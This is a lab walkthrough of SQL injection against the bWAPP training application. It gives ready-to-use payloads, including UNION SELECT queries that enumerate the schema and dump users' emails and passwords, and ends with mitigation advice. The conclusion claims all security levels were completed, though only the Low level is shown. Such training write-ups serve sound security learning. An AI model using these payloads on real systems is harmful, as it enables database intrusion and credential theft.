bWAPP - SQL Injection (GET/Search)

bWAPP – SQL Injection (GET/Search)

In this walk through, we will be going through the SQL Injection (GET/Search) vulnerability section from bWAPP Labs. We will be exploring and exploiting SQL Injection in GET requests and search parameters and learn how application are affected because of it. So, let’s get started with the Hacking without any delay.

SQL Injection (GET/Search)

Table of Contents

Security: Low

  • Setting the security level to Low.

Security level Low

  • The application consist of a search box which is used to search movies in the database and provide information regarding that. Upon click the search button a GET request is issued to sqli_1.php file which in return gives us the output on the front end.

SQL Injection (GET/Search)

Burpsuite intercept

  • I break the SQL statement by inputting ‘” ‘ ” in the search box and it caused an MySQL error which is good as it might be vulnerable to SQL injection.

'

SQL Error

  • I used the below payload to check for the SQL injection and it worked. The query returns all the records available in the database.

asd' OR 1='1 ;

Dumping all data

  • Let’s move ahead a little and dump whole database with emails and passwords of the users in the application. We will start by checking the no. of columns in the database. For that, we used ORDER BY clause, as we can see we hit an “Unknown column” error on column 8 but no error on column 7. That means, there are 7 columns in the DB.

asd' ORDER BY 10-- -
asd' ORDER BY 8-- -
asd' ORDER BY 7-- -

Order by clause

Number of columns found

No movies found

  • Let’s find out which column can be used to retrieve data. Here, the second data got reflected in the front end.

asd' UNION SELECT NULL,"asd",NULL,NULL,NULL,NULL,NULL-- -

Payload

  • Moving on, let’s dump the database name using the below payload.

asd' UNION SELECT NULL,database(),NULL,NULL,NULL,NULL,NULL-- -

Enumerate database

  • Now we have our database name “bWAPP”. Let’s find out the tables inside it using the below payload.

asd' UNION SELECT NULL,table_name,NULL,NULL,NULL,NULL,NULL from information_schema.tables where table_schema=database()-- -

Dump tables

  • Out of the above dumped table, the “users” tables seems interesting. Let’s dump the no. of columns inside it with the below payload.

asd' UNION SELECT NULL,column_name,NULL,NULL,NULL,NULL,NULL from information_schema.columns where table_name='users'-- -

Dumping columns

  • Let’s dump email and password with the below payload.

asd' UNION SELECT NULL,email,password,NULL,NULL,NULL,NULL from users-- -

Dumping username and password

Also Read: bWAPP – Session Management (Strong Sessions)

Conclusion:

Conclusion

So, we finally completed all the security levels for the bWAPP SQL Injection (GET/Search) Vulnerability. We looked into the various ways how application has been set up in various levels and how we can bypass the security controls implemented. Next, we can mitigate the potential SQL Injection attacks by performing input sanitization and using prepared statements or parametrized queries for every SQL query made by the application to the database. On that note, i will take your leave and will meet you in next one with another bWAPP vulnerability writeup, till then “Keep Hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top